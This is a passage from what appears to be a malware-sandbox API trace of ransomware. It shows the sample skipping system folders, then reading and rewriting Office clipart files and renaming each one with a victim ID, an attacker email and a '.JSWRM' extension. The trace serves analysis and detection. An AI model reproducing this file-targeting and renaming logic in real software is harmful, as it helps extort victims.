out: lpWideCharStr=0x0) returned 8 [0081.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0081.561] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0081.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0081.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0081.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0081.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0081.562] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0081.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.562] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x287c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105638.WMF", cAlternateFileName="")) returned 1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2=".") returned 1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="..") returned 1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="...") returned 1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="windows") returned -1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="recovery") returned -1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="perflogs") returned -1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="documents and settings") returned 1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.562] lstrcmpiW (lpString1="J0105638.WMF", lpString2="system volume information") returned -1 [0081.563] lstrcmpiW (lpString1="J0105638.WMF", lpString2="msocache") returned -1 [0081.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0081.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105638.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105638.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105638.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0081.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0081.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105638.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105638.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105638.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0081.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0081.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0081.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.563] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.563] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.563] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10364) returned 1 [0081.563] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2870) returned 0x24d210 [0081.563] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2870, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2870, lpOverlapped=0x0) returned 1 [0081.565] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.565] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2870, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2870, lpOverlapped=0x0) returned 1 [0081.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.565] CloseHandle (hObject=0x314) returned 1 [0081.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2b8 [0081.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2b8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2b8 | out: hHeap=0x1e0000) returned 1 [0081.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0081.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0081.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0081.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.566] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0081.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0081.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0081.567] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x35f0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105710.WMF", cAlternateFileName="")) returned 1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2=".") returned 1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="..") returned 1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="...") returned 1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="windows") returned -1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="recovery") returned -1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="perflogs") returned -1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="documents and settings") returned 1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="system volume information") returned -1 [0081.567] lstrcmpiW (lpString1="J0105710.WMF", lpString2="msocache") returned -1 [0081.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105710.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105710.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105710.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0081.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105710.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105710.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105710.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0081.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0081.567] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.567] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0081.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.568] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13808) returned 1 [0081.568] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x35f0) returned 0x24d210 [0081.568] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x35f0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x35f0, lpOverlapped=0x0) returned 1 [0081.570] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.570] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x35f0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x35f0, lpOverlapped=0x0) returned 1 [0081.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.571] CloseHandle (hObject=0x314) returned 1 [0081.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0081.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0081.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0081.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0081.571] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0081.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0081.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0081.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0081.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.571] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0081.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0081.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0081.572] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2030, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105846.WMF", cAlternateFileName="")) returned 1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2=".") returned 1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="..") returned 1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="...") returned 1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="windows") returned -1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="recovery") returned -1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="perflogs") returned -1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="documents and settings") returned 1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="system volume information") returned -1 [0081.572] lstrcmpiW (lpString1="J0105846.WMF", lpString2="msocache") returned -1 [0081.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0081.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105846.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105846.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105846.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0081.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0081.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105846.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105846.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105846.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0081.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0081.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0081.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0081.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.573] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8240) returned 1 [0081.573] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.573] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2030) returned 0x205850 [0081.573] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2030, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2030, lpOverlapped=0x0) returned 1 [0081.575] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.575] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2030, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2030, lpOverlapped=0x0) returned 1 [0081.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0081.575] CloseHandle (hObject=0x314) returned 1 [0081.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0081.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.575] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0081.575] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.575] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0081.576] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0081.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0081.576] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0081.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0081.576] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0081.576] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0081.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0081.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0081.577] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe67776a, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe67776a, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe67776a, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2dc8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105912.WMF", cAlternateFileName="")) returned 1 [0081.577] 